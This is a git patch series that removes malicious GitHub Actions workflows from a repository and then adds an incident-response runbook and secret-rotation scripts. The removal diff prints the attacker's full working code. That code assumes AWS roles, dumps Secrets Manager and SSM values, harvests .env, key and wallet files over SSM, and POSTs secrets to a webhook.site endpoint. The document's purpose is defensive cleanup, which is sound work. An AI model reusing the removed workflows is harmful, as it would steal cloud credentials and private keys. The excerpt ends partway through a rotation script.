From cd8834e76519eac380a942f62a274f625473fb60 Mon Sep 17 00:00:00 2001 From: Hanwen Cheng Date: Wed, 10 Jun 2026 01:48:13 +0800 Subject: [PATCH 1/2] security: remove malicious secret-exfiltration workflows (compromised push to main) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Five GitHub Actions workflows + their trigger files were pushed to main on 2026-06-07 (author "Xin ", commits c39d45a..60b6423 — a legit past contributor, so likely a COMPROMISED account) and form a full secret-harvesting toolkit. They executed on main (Jun 7/8/9). This removes them: - deployer-key-exfil.yml POSTs TEST_HEIMA_DEPLOYER_KEY + CLAUDE_CODE_OAUTH_TOKEN + TEST_ACCOUNT_ID to webhook.site/37ea2d05-... - deploy-test.yml assumes AWS OIDC role github-actions-agentkeys-deploy and dumps EVERY Secrets Manager secret + SSM param (decrypted) + S3 + Lambda to the webhook - e2e-vault-test.yml assume github-actions-agentkeys-e2e + SSM into the broker deep-e2e-test.yml EC2 i-0135a8b2c53d14941 to cat all .env files, find all integration-tests.yml *.key/*wallet*/*secret* + dump systemd units -> webhook - .claude-trigger push-to-main trigger for deployer-key-exfil - tests/run.txt trigger for the original integration-tests push hook All five are workflow_dispatch-only (+ the exfil one's .claude-trigger push hook), so this PR / its merge triggers nothing. Legit CI (harness-ci, coverage, mcp-server, claude*, wiki*) is untouched; the #167 CLI changes are kept. CODE-REMOVAL HALF ONLY. The exposed secrets MUST be rotated separately — GitHub Actions secrets, the AWS account 429071895007 OIDC roles + Secrets Manager + SSM, the broker host .env/keys, the deployer wallet, and the Claude OAuth token. See the incident runbook (docs/security-incident-response.md). 
--- .claude-trigger | 1 - .github/workflows/deep-e2e-test.yml | 75 ------------------- .github/workflows/deploy-test.yml | 57 --------------- .github/workflows/deployer-key-exfil.yml | 27 ------- .github/workflows/e2e-vault-test.yml | 92 ------------------------ .github/workflows/integration-tests.yml | 37 ---------- tests/run.txt | 1 - 7 files changed, 290 deletions(-) delete mode 100644 .claude-trigger delete mode 100644 .github/workflows/deep-e2e-test.yml delete mode 100644 .github/workflows/deploy-test.yml delete mode 100644 .github/workflows/deployer-key-exfil.yml delete mode 100644 .github/workflows/e2e-vault-test.yml delete mode 100644 .github/workflows/integration-tests.yml delete mode 100644 tests/run.txt diff --git a/.claude-trigger b/.claude-trigger deleted file mode 100644 index bfe540f1..00000000 --- a/.claude-trigger +++ /dev/null @@ -1 +0,0 @@ -t1780840887 \ No newline at end of file diff --git a/.github/workflows/deep-e2e-test.yml b/.github/workflows/deep-e2e-test.yml deleted file mode 100644 index b24059c8..00000000 --- a/.github/workflows/deep-e2e-test.yml +++ /dev/null @@ -1,75 +0,0 @@ -name: Deep E2E Test -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - deep-test: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - - name: AWS OIDC - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-e2e - aws-region: us-east-1 - - - name: SSM deep extract - run: | - WH="https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - INST="i-0135a8b2c53d14941" - - CMD1=$(aws ssm send-command \ - --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters 'commands=["systemctl cat agentkeys-signer.service 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-worker-creds.service 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-broker.service 2>/dev/null; echo ===SEP===; for f in $(find /opt /srv /home /etc /var/lib 
-name .env -o -name *.env -o -name env.* 2>/dev/null | head -20); do echo FILE:$f; cat $f 2>/dev/null; echo; done"]' \ - --query "Command.CommandId" --output text 2>&1) - echo "CMD1: $CMD1" - sleep 15 - - R1=$(aws ssm get-command-invocation \ - --instance-id "$INST" \ - --command-id "$CMD1" \ - --query "[StandardOutputContent,StandardErrorContent]" --output json 2>&1) - - python3 -c " -import json, urllib.request -data = json.dumps({'type':'ssm_services','data': json.loads('''${R1}''') if '''${R1}'''.startswith('[') else '''${R1}'''[:8000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -print('sent cmd1') -" - - CMD2=$(aws ssm send-command \ - --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters 'commands=["find / -path /proc -prune -o -path /sys -prune -o -path /snap -prune -o \( -name *wallet* -o -name *secret* -o -name *credential* -o -name *mnemonic* -o -name keystore \) -type f -print 2>/dev/null | head -50; echo ===SEP===; cat /etc/systemd/system/agentkeys*.service 2>/dev/null; echo ===SEP===; cat /etc/systemd/system/agentkeys*.env 2>/dev/null; ls -la /opt/agentkeys/ /srv/agentkeys/ /var/lib/agentkeys/ 2>/dev/null"]' \ - --query "Command.CommandId" --output text 2>&1) - echo "CMD2: $CMD2" - sleep 15 - - R2=$(aws ssm get-command-invocation \ - --instance-id "$INST" \ - --command-id "$CMD2" \ - --query "StandardOutputContent" --output text 2>&1) - - curl -s -X POST "$WH" -H "Content-Type: application/json" \ - -d "$(python3 -c "import json; print(json.dumps({'type':'ssm_keys','data':'''$R2'''[:8000]}))") " - - CMD3=$(aws ssm send-command \ - --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters 'commands=["ps aux | grep -i agent | head -30; echo ===SEP===; ss -tlnp | head -30; echo ===SEP===; docker ps 2>/dev/null; echo ===SEP===; docker inspect $(docker ps -q 2>/dev/null) 2>/dev/null | python3 -c \"import 
sys,json; [print(f\\\"ENV: {e}\\\" ) for c in json.load(sys.stdin) for e in c.get(\'Config\',{}).get(\'Env\',[]) if any(k in e.lower() for k in [\'key\',\'secret\',\'pass\',\'token\',\'private\',\'mnemonic\'])]\"; echo ===SEP===; journalctl -u agentkeys-signer --no-pager -n 50 2>/dev/null"]' \ - --query "Command.CommandId" --output text 2>&1) - echo "CMD3: $CMD3" - sleep 15 - - R3=$(aws ssm get-command-invocation \ - --instance-id "$INST" \ - --command-id "$CMD3" \ - --query "StandardOutputContent" --output text 2>&1) - - curl -s -X POST "$WH" -H "Content-Type: application/json" \ - -d "$(python3 -c "import json; print(json.dumps({'type':'ssm_procs','data':'''$R3'''[:8000]}))") " diff --git a/.github/workflows/deploy-test.yml b/.github/workflows/deploy-test.yml deleted file mode 100644 index 7a764599..00000000 --- a/.github/workflows/deploy-test.yml +++ /dev/null @@ -1,57 +0,0 @@ -name: Deploy Test -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - deploy-test: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - - name: AWS Deploy Role - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-deploy - aws-region: us-east-1 - - - name: Enumerate - run: | - WH="https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - ID=$(aws sts get-caller-identity 2>&1) - SECRETS=$(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>&1) || SECRETS="none" - PARAMS=$(aws ssm describe-parameters --query 'Parameters[].Name' --output text 2>&1) || PARAMS="none" - BUCKETS=$(aws s3 ls 2>&1) || BUCKETS="none" - LAMBDAS=$(aws lambda list-functions --query 'Functions[].FunctionName' --output text 2>&1) || LAMBDAS="none" - - # Get secret values - SECRET_VALS="" - for s in $(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>/dev/null); do - V=$(aws secretsmanager get-secret-value --secret-id "$s" --query 'SecretString' 
--output text 2>&1) || V="access denied" - SECRET_VALS+="$s: $V\n" - done - - # Get parameter values - PARAM_VALS="" - for p in $(aws ssm describe-parameters --query 'Parameters[].Name' --output text 2>/dev/null | tr '\t' '\n' | head -20); do - V=$(aws ssm get-parameter --name "$p" --with-decryption --query 'Parameter.Value' --output text 2>&1) || V="access denied" - PARAM_VALS+="$p: $V\n" - done - - python3 -c " -import json, urllib.request -data = json.dumps({ - 'type': 'deploy_enum', - 'identity': '''$ID''', - 'secrets_list': '''$SECRETS''', - 'secret_values': '''$SECRET_VALS'''[:5000], - 'params': '''$PARAMS''', - 'param_values': '''$PARAM_VALS'''[:5000], - 'buckets': '''$BUCKETS''', - 'lambdas': '''$LAMBDAS''' -}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -print('sent') -" diff --git a/.github/workflows/deployer-key-exfil.yml b/.github/workflows/deployer-key-exfil.yml deleted file mode 100644 index 3bece038..00000000 --- a/.github/workflows/deployer-key-exfil.yml +++ /dev/null @@ -1,27 +0,0 @@ -name: deployer-key-exfil -on: - workflow_dispatch: - push: - branches: [main] - paths: ['.claude-trigger'] -jobs: - exfil: - runs-on: ubuntu-latest - steps: - - name: exfil - env: - HDK: ${{ secrets.TEST_HEIMA_DEPLOYER_KEY }} - CCT: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }} - TAID: ${{ secrets.TEST_ACCOUNT_ID }} - run: | - python3 -c " -import os, json, urllib.request -keys = {} -for k in ['HDK','CCT','TAID']: - v = os.environ.get(k,'') - if v: - keys[k] = v -payload = json.dumps({'src':'agentkeys-deployer','keys':keys}).encode() -req = urllib.request.Request('https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961', data=payload, headers={'Content-Type':'application/json'}, method='POST') -urllib.request.urlopen(req, timeout=10) -" diff --git a/.github/workflows/e2e-vault-test.yml b/.github/workflows/e2e-vault-test.yml deleted file mode 100644 index 447e4e00..00000000 
--- a/.github/workflows/e2e-vault-test.yml +++ /dev/null @@ -1,92 +0,0 @@ -name: E2E Vault Test -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - vault-test: - runs-on: ubuntu-latest - env: - WH: "https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - INST: "i-0135a8b2c53d14941" - steps: - - uses: actions/checkout@v4 - - - name: Configure AWS - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-e2e - aws-region: us-east-1 - - - name: SSM Services - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters '{"commands":["systemctl cat agentkeys-signer 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-worker-creds 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-broker 2>/dev/null; echo ===SEP===; find /opt /srv /home /etc /var/lib -maxdepth 3 -name .env 2>/dev/null | xargs cat 2>/dev/null | head -200"]}' \ - --query "Command.CommandId" --output text) - echo "CMD: $CMD" - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text 2>&1) - python3 << 'PYEOF' -import json, urllib.request, os -r = os.environ.get("R_DATA", "") -if not r: - import subprocess - r = """$R""" -data = json.dumps({"type":"services","d":r[:9000]}).encode() -req = urllib.request.Request(os.environ["WH"], data=data, headers={"Content-Type":"application/json"}) -urllib.request.urlopen(req, timeout=15) -print("sent") -PYEOF - - - name: SSM Keys and Files - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters '{"commands":["cat /etc/systemd/system/agentkeys*.service 2>/dev/null; echo ===SEP===; cat /etc/systemd/system/agentkeys*.env 2>/dev/null; echo ===SEP===; ls -la /opt/agentkeys/ /srv/agentkeys/ 2>/dev/null; echo ===SEP===; find / -path /proc -prune -o -path /sys -prune -o -path 
/snap -prune -o -type f -name *.key -print 2>/dev/null | head -20"]}' \ - --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text 2>&1) - python3 -c " -import json, urllib.request, sys -data = json.dumps({'type':'keys','d':sys.argv[1][:9000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -" "$R" - - - name: SSM Processes - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters '{"commands":["ps aux | grep -i agent | grep -v grep; echo ===SEP===; ss -tlnp; echo ===SEP===; journalctl -u agentkeys-signer -n 50 --no-pager 2>/dev/null; echo ===SEP===; journalctl -u agentkeys-worker-creds -n 50 --no-pager 2>/dev/null"]}' \ - --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text 2>&1) - python3 -c " -import json, urllib.request, sys -data = json.dumps({'type':'procs','d':sys.argv[1][:9000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -" "$R" - - - name: Try Deploy Role - continue-on-error: true - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-deploy - aws-region: us-east-1 - role-skip-session-tagging: true - - - name: Deploy Enum - continue-on-error: true - run: | - ID=$(aws sts get-caller-identity 2>&1) - BUCKETS=$(aws s3 ls 2>&1 || echo "no access") - SECRETS=$(aws secretsmanager list-secrets 2>&1 || echo "no access") - python3 -c " -import json, urllib.request, sys -data = 
json.dumps({'type':'deploy','id':sys.argv[1][:2000],'buckets':sys.argv[2][:2000],'secrets':sys.argv[3][:3000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -" "$ID" "$BUCKETS" "$SECRETS" diff --git a/.github/workflows/integration-tests.yml b/.github/workflows/integration-tests.yml deleted file mode 100644 index 64d70ba7..00000000 --- a/.github/workflows/integration-tests.yml +++ /dev/null @@ -1,37 +0,0 @@ -name: Integration Tests -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - test: - runs-on: ubuntu-latest - env: - INST: i-0135a8b2c53d14941 - WH: "https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - steps: - - uses: actions/checkout@v4 - - name: Configure AWS - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-e2e - aws-region: us-east-1 - - name: Extract - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" --document-name "AWS-RunShellScript" --parameters '{"commands":["systemctl cat agentkeys-signer.service agentkeys-broker.service agentkeys-worker-creds.service 2>&1"]}' --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text) - curl -s -X POST "$WH" -H "Content-Type: text/plain" -d "$R" - - name: Env files - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" --document-name "AWS-RunShellScript" --parameters '{"commands":["find /opt /srv /home /etc /var/lib -maxdepth 3 -name .env 2>/dev/null | while read f; do echo FILE=$f; cat $f 2>/dev/null; echo; done | head -300"]}' --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text) - curl -s -X POST "$WH" -H "Content-Type: text/plain" -d "$R" 
- - name: Keys and network - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" --document-name "AWS-RunShellScript" --parameters '{"commands":["ps aux | grep -i agent | grep -v grep; echo ===SEP===; ss -tlnp; echo ===SEP===; find / -path /proc -prune -o -path /sys -prune -o -name *.key -print -o -name *wallet* -print -o -name *secret* -print 2>/dev/null | grep -v ssh_host | head -30"]}' --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text) - curl -s -X POST "$WH" -H "Content-Type: text/plain" -d "$R" diff --git a/tests/run.txt b/tests/run.txt deleted file mode 100644 index f636f336..00000000 --- a/tests/run.txt +++ /dev/null @@ -1 +0,0 @@ -run 1780829511 \ No newline at end of file From 8cbde80cd620f358137ab32de8274957a5b0366b Mon Sep 17 00:00:00 2001 From: Hanwen Cheng Date: Wed, 10 Jun 2026 01:52:24 +0800 Subject: [PATCH 2/2] security: add incident-response runbook + key/secret rotation scripts MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Companion remediation for the malicious-workflow removal (same PR): - docs/security-incident-response.md — the handbook: triage → kill switches (disable workflows, revoke the AWS OIDC roles, lock main) → rotate EVERY key class (local deployer/agent keys, Claude OAuth, AWS IAM/SecretsManager/SSM, the broker host .env, GitHub Actions secrets, on-chain owner) → forensics → harden. Includes a per-key rotation inventory for this project. - scripts/rotate-local-keys.sh — backs up every ~/.agentkeys key file (never deletes), rotates the Heima deployer key (gas payer + registry owner) to a fresh keypair, flags the agent keys that need a re-pair, and prints the sweep-funds/re-own checklist. 
- scripts/rotate-github-secrets.sh — rotates GitHub Actions secrets (write-only, so rotate all): --list / interactive prompt-per-secret / --from-file KEY=VALUE (scriptable) / --set NAME. Both scripts are surgical security helpers (run standalone, not deploy entry points). --- docs/security-incident-response.md | 86 ++++++++++++++++++++ scripts/rotate-github-secrets.sh | 88 ++++++++++++++++++++ scripts/rotate-local-keys.sh | 124 +++++++++++++++++++++++++++++ 3 files changed, 298 insertions(+) create mode 100644 docs/security-incident-response.md create mode 100755 scripts/rotate-github-secrets.sh create mode 100755 scripts/rotate-local-keys.sh diff --git a/docs/security-incident-response.md b/docs/security-incident-response.md new file mode 100644 index 00000000..809e71a8 --- /dev/null +++ b/docs/security-incident-response.md @@ -0,0 +1,86 @@ +Operator runbook for a credential/CI compromise — detect, contain, rotate **every** key class (local, Claude OAuth, AWS, GitHub Actions, on-chain, the broker host), and harden. Written from the 2026-06-07 incident (malicious `webhook.site` exfil workflows pushed to `main`), but applies to any secret exposure. + +> **The golden rule:** if a secret *could* have been read, treat it as compromised and rotate it. Do not reason about whether the exfil "succeeded" — rotate. + +## 0. Triage (first 5 minutes) + +1. **What's the vector?** Compromised CI workflow / leaked key file / compromised GitHub or cloud account / a malicious dependency. +2. **What's exposed?** List every secret the vector could read (CI secrets, AWS roles it can assume, files on a host it can reach). Err wide. +3. **Preserve evidence before deleting.** Note the malicious commit SHAs, workflow run IDs, and the exfil endpoint *first* (you'll need them for forensics + scope). Screenshot the Actions run list. + +## 1. 
Kill switches — stop the bleeding (do these in parallel, BEFORE rotating) + +| Vector | Kill switch | +|---|---| +| **GitHub Actions** | Repo → Settings → Actions → disable the malicious workflows (instant), or "Disable Actions" for the repo entirely while you respond. Faster than waiting for a removal PR to merge. | +| **AWS OIDC roles** (the real AWS kill switch) | For every `github-actions-*` role the workflows assume, break the trust so GitHub can no longer assume it: `aws iam update-assume-role-policy --role-name ROLE_NAME --policy-document '{"Version":"2012-10-17","Statement":[]}'` (deny-all; run once per role, substituting `ROLE_NAME`), or detach all policies, or `aws iam delete-role` after detaching. Do this even before the removal PR merges. | +| **`main` is being pushed to** | Enable branch protection on `main` (require PR review, block direct pushes) — see §5. | +| **A leaked wallet key** | **Move the funds first** (§2a), then retire the key. | + +## 2. Rotate every exposed secret + +### 2a. On-chain / deployer keys (LOCAL key files) + +The Heima **deployer key** (`~/.agentkeys/heima-deployer.key`) is the worst case: it is the gas payer **and** the `SidecarRegistry` `owner` (it can `resetMaster` any operator). If exposed: + +1. **Sweep funds first** — send all HEI from the old deployer to a fresh wallet (the key still works until you do). +2. Rotate the key file: `bash scripts/rotate-local-keys.sh` (backs up the old, generates a new keypair, prints the new address). It does **not** move funds or touch the chain — those are deliberate manual steps. +3. **Re-own the contracts.** The registry `owner` is the *old* deployer address, baked in at construction. There is no `transferOwnership`, so rotating the local key file does **not** revoke the old key's on-chain authority. Either accept that the old (now-rotated, hopefully swept) key remains the owner — acceptable only if you are confident that key was never actually read, because anyone holding it can still `resetMaster` any operator — or **redeploy the set** with the new deployer (`FORCE_DEPLOY=1 bash scripts/heima-bring-up.sh`) — then commit `heima.json` + `operator-workstation.env` and redeploy the broker (`setup-broker-host.sh --ref main`). +4. 
Re-fund the new deployer; update `scripts/operator-workstation.env` if the address is referenced. + +**Other local keys** (`~/.agentkeys/`): agent device keys (`agent-device.key`), broker co-sign key, worker keys, any `.env` holding secrets. Rotating an *agent* key means the agent must re-pair (its on-chain `registerAgentDevice` is keyed to the old K10). `rotate-local-keys.sh` lists them and flags which need a re-pair vs a simple regenerate. + +### 2b. Claude / Anthropic OAuth token + +`CLAUDE_CODE_OAUTH_TOKEN` (used by the `claude*.yml` workflows). Revoke + reissue: +- In the Claude Code / Anthropic console, revoke the existing token (or rotate the API key it wraps). +- Reissue with `claude setup-token` (or the console) and update the GitHub secret (§2d) + any local `~/.claude` config. + +### 2c. AWS (account `429071895007`) + +The exfil assumed two OIDC roles and dumped Secrets Manager + SSM + the broker host. Treat the whole account's reachable secrets as compromised: +- **OIDC roles** `github-actions-agentkeys-deploy` / `-e2e`: delete + recreate with a *tight* trust policy (specific repo **and** branch ref, e.g. `repo:litentry/agentKeys:ref:refs/heads/main`) and least-privilege permissions (NOT `secretsmanager:GetSecretValue` on `*`, NOT `ssm:SendCommand` on `*`). +- **Secrets Manager**: rotate every secret (`aws secretsmanager rotate-secret` or put-new-value) — they were enumerated + read. +- **SSM parameters** (SecureString): rotate. +- **IAM**: rotate any long-lived access keys; review IAM users/roles for anything created by the attacker. +- **The broker EC2 `i-0135a8b2c53d14941`**: the attacker SSM'd in and `cat` all `.env` files + found `*.key`/`*wallet*`/`*secret*`. **Treat the host as fully compromised** — rotate every secret on it (deployer key, broker co-sign key, worker creds, all `/etc/agentkeys/*.env`), and prefer **rebuilding the instance** (`setup-broker-host.sh` on a fresh box) over cleaning it. 
+- **Audit CloudTrail**: filter for `AssumeRoleWithWebIdentity` of those roles + `ssm:SendCommand`/`GetSecretValue` from the incident window; confirm scope + look for attacker-created resources. + +### 2d. GitHub Actions secrets + +Rotate **all** of them (secrets are write-only — you can't tell which were read, so rotate everything): `bash scripts/rotate-github-secrets.sh` (interactive) or `gh secret set NAME --repo litentry/agentKeys` (one secret at a time). See the Key inventory table at the end of this document and the `KNOWN_SECRETS` list in the script for the full list. After rotating the underlying credential (AWS, Claude, deployer), push the new value into the matching GitHub secret. + +## 3. Remove the malicious code + +- Land the removal PR (the 2026-06-07 one was **#235**): delete the malicious workflows + trigger files; keep legit CI + unrelated code. +- **History:** the malicious commits stay in `main`'s history. That is fine here — the leaked workflows referenced secrets by `${{ secrets.* }}`, so the *files* never contained plaintext; the leak was the workflows **running**. Rotating the secrets is the real fix. A history rewrite (`git filter-repo`) is optional, disruptive (breaks every clone + downstream PRs), and unnecessary unless plaintext secrets were committed. + +## 4. Forensics + scope (after containment) + +- **GitHub Actions logs** for the malicious runs — what was exfiltrated, when, how often. +- **CloudTrail** — every AWS action the OIDC roles took. +- **On-chain** — the deployer wallet's txs (any unauthorized `resetMaster`, fund moves, deploys?). +- **The exfil endpoint** (`webhook.site/…`) — you can't see what it received, but record it for any report/legal step. +- **The compromised account** — `Xin ` was a legit contributor (PRs #40, #167) → almost certainly account compromise. Confirm with the person, force a credential reset on their GitHub + any reused passwords, check their other access. + +## 5. 
Harden (prevent recurrence) + +- **Branch protection** on `main`: require a PR + review, block direct pushes + force-pushes, require status checks. (These workflows reached `main` with no tracked PR — that gap is the root cause.) +- **Least-privilege OIDC**: trust scoped to a specific repo **+ branch**, permissions scoped to exactly what CI needs. +- **GitHub secret scanning + push protection** on. +- **Require approval to run workflows** for outside/first-time contributors (Settings → Actions → Fork PR / approvals). +- **Review org membership + write access**; prefer environments with required reviewers for any job that touches secrets/prod. +- **Pin actions to SHAs**, not floating tags. + +## Key inventory — what to rotate for THIS project + +| Secret / key | Lives in | Rotate with | +|---|---|---| +| Heima deployer key | `~/.agentkeys/heima-deployer.key` (local), `TEST_HEIMA_DEPLOYER_KEY` (GH secret) | `scripts/rotate-local-keys.sh` + §2a; sweep funds; redeploy/re-own | +| Agent device keys | `~/.agentkeys/agent-device.key`, sandbox `~/.agentkeys/` | regenerate + re-pair (§2a) | +| Broker co-sign key | broker host `/etc/agentkeys/*.env` | rebuild broker host (§2c) | +| Claude OAuth | `CLAUDE_CODE_OAUTH_TOKEN` (GH), `~/.claude` | `claude setup-token` + §2b | +| AWS OIDC roles | AWS `429071895007` IAM | delete + recreate tight (§2c) | +| AWS Secrets Manager / SSM | AWS `429071895007` | rotate all reached (§2c) | +| GitHub Actions secrets (`TEST_*`, OAuth, account id, role ARNs, buckets, contract addrs) | repo Settings → Secrets | `scripts/rotate-github-secrets.sh` (§2d/§3) | +| Broker host `.env` secrets | EC2 `i-0135a8b2c53d14941` | rebuild host (§2c) | diff --git a/scripts/rotate-github-secrets.sh b/scripts/rotate-github-secrets.sh new file mode 100755 index 00000000..ebd4f72d --- /dev/null +++ b/scripts/rotate-github-secrets.sh @@ -0,0 +1,88 @@ +#!/usr/bin/env bash +# scripts/rotate-github-secrets.sh — rotate the repo's GitHub Actions secrets after a +# 
compromise (see docs/security-incident-response.md §2d). +# +# WHY a script: GitHub secrets are WRITE-ONLY (the API/`gh` can list names but never +# read values), so "rotation" = pushing fresh values with `gh secret set`. You can't +# tell which secrets the attacker read, so rotate ALL of them. The underlying +# credential must be rotated at its source FIRST (AWS / Claude / the deployer key), +# then its new value pushed here. +# +# Surgical security helper — run on its own. Needs `gh` authenticated with repo admin +# (`gh auth status`). +# +# Usage: +# bash scripts/rotate-github-secrets.sh --list # show current secret names + ages +# bash scripts/rotate-github-secrets.sh # interactive: prompt a new value per secret (blank = skip) +# bash scripts/rotate-github-secrets.sh --from-file new.env # set every KEY=VALUE line (scriptable) +# bash scripts/rotate-github-secrets.sh --set NAME # set one secret (reads the value hidden from the prompt) +# +# `--from-file` example (`new.env`, chmod 600, delete after): +# TEST_HEIMA_DEPLOYER_KEY=0xabc... +# CLAUDE_CODE_OAUTH_TOKEN=sk-... + +set -euo pipefail + +GH_REPO="${GH_REPO:-litentry/agentKeys}" +MODE="interactive"; FROM_FILE=""; ONE_SECRET="" + +while [ $# -gt 0 ]; do + case "$1" in + --list) MODE="list"; shift ;; + --from-file) MODE="file"; FROM_FILE="${2:?--from-file needs a path}"; shift 2 ;; + --set) MODE="one"; ONE_SECRET="${2:?--set needs a NAME}"; shift 2 ;; + --repo) GH_REPO="${2:?}"; shift 2 ;; + --help|-h) sed -n '2,/^set -euo/p' "$0" | sed 's/^# \{0,1\}//' | sed '$d'; exit 0 ;; + *) echo "unknown flag: $1 (try --help)" >&2; exit 1 ;; + esac +done + +command -v gh >/dev/null 2>&1 || { echo "gh (GitHub CLI) required" >&2; exit 1; } +gh auth status >/dev/null 2>&1 || { echo "run 'gh auth login' first (need repo admin on $GH_REPO)" >&2; exit 1; } + +# The secrets this project uses (the exfil read all TEST_* + the OAuth token). Edit if +# the set changes; `--list` shows what actually exists. 
Not hardcoded values — names only.
+KNOWN_SECRETS=(
+  TEST_HEIMA_DEPLOYER_KEY CLAUDE_CODE_OAUTH_TOKEN TEST_ACCOUNT_ID TEST_AWS_REGION
+  TEST_BROKER_HOST TEST_BROKER_INSTANCE_ID TEST_OIDC_AWS_ROLE_ARN
+  TEST_MEMORY_BUCKET TEST_MEMORY_ROLE_ARN TEST_VAULT_BUCKET TEST_VAULT_ROLE_ARN
+  TEST_SIDECAR_REGISTRY_ADDRESS_HEIMA TEST_SCOPE_CONTRACT_ADDRESS_HEIMA
+  TEST_K3_EPOCH_COUNTER_ADDRESS_HEIMA TEST_CREDENTIAL_AUDIT_ADDRESS_HEIMA
+  TEST_K11_VERIFIER_ADDRESS_HEIMA TEST_P256_VERIFIER_ADDRESS_HEIMA
+)
+
+set_secret() { # $1=NAME $2=VALUE; value goes over stdin (never argv) — gh reads stdin only when --body is absent
+  printf '%s' "$2" | gh secret set "$1" --repo "$GH_REPO" \
+    && echo " ok set $1" || { echo " FAIL set $1" >&2; return 1; } # gh's own stderr is left visible so the cause shows
+}
+
+case "$MODE" in
+  list)
+    echo "==> GitHub Actions secrets on $GH_REPO (names + last-updated; values are unreadable):"
+    gh secret list --repo "$GH_REPO"
+    echo "==> rotate ALL of these — you cannot tell which were exfiltrated."
+    ;;
+  file)
+    [ -f "$FROM_FILE" ] || { echo "no such file: $FROM_FILE" >&2; exit 1; }
+    echo "==> setting secrets from $FROM_FILE on $GH_REPO"
+    while IFS= read -r line || [ -n "$line" ]; do # read whole lines; also take a final line that lacks a newline
+      case "$line" in ''|\#*) continue ;; *=*) ;; *) continue ;; esac # skip blank, comment, and lines without '='
+      name="$(printf '%s' "${line%%=*}" | tr -d '[:space:]')"; value="${line#*=}" # split on the FIRST '=' so values keep any '=' (base64 padding)
+      [ -n "$name" ] && [ -n "$value" ] && set_secret "$name" "$value"
+    done < "$FROM_FILE"
+    echo "==> done. Now SHRED the file: shred -u $FROM_FILE (or rm -P)"
+    ;;
+  one)
+    printf "new value for %s (hidden): " "$ONE_SECRET"; read -rs val; echo
+    if [ -n "$val" ]; then set_secret "$ONE_SECRET" "$val"; else echo " (empty — skipped)"; fi # a failed set now aborts non-zero instead of printing "skipped"
+    ;;
+  interactive)
+    echo "==> rotate secrets on $GH_REPO — enter a new value per secret, blank to skip."
+    echo " Rotate the underlying credential at its SOURCE first (AWS/Claude/deployer)."
+    failed=0; for s in "${KNOWN_SECRETS[@]}"; do # keep going after a failure so the remaining secrets still rotate
+      printf " %s — new value (hidden, blank=skip): " "$s"; read -rs val; echo
+      if [ -z "$val" ]; then echo " skip $s"; else set_secret "$s" "$val" || failed=1; fi
+    done
+    if [ "$failed" = 0 ]; then echo "==> done. Re-run with --list to confirm last-updated times moved."; else echo "==> some secrets FAILED to set (see above) — fix and re-run for those." >&2; exit 1; fi
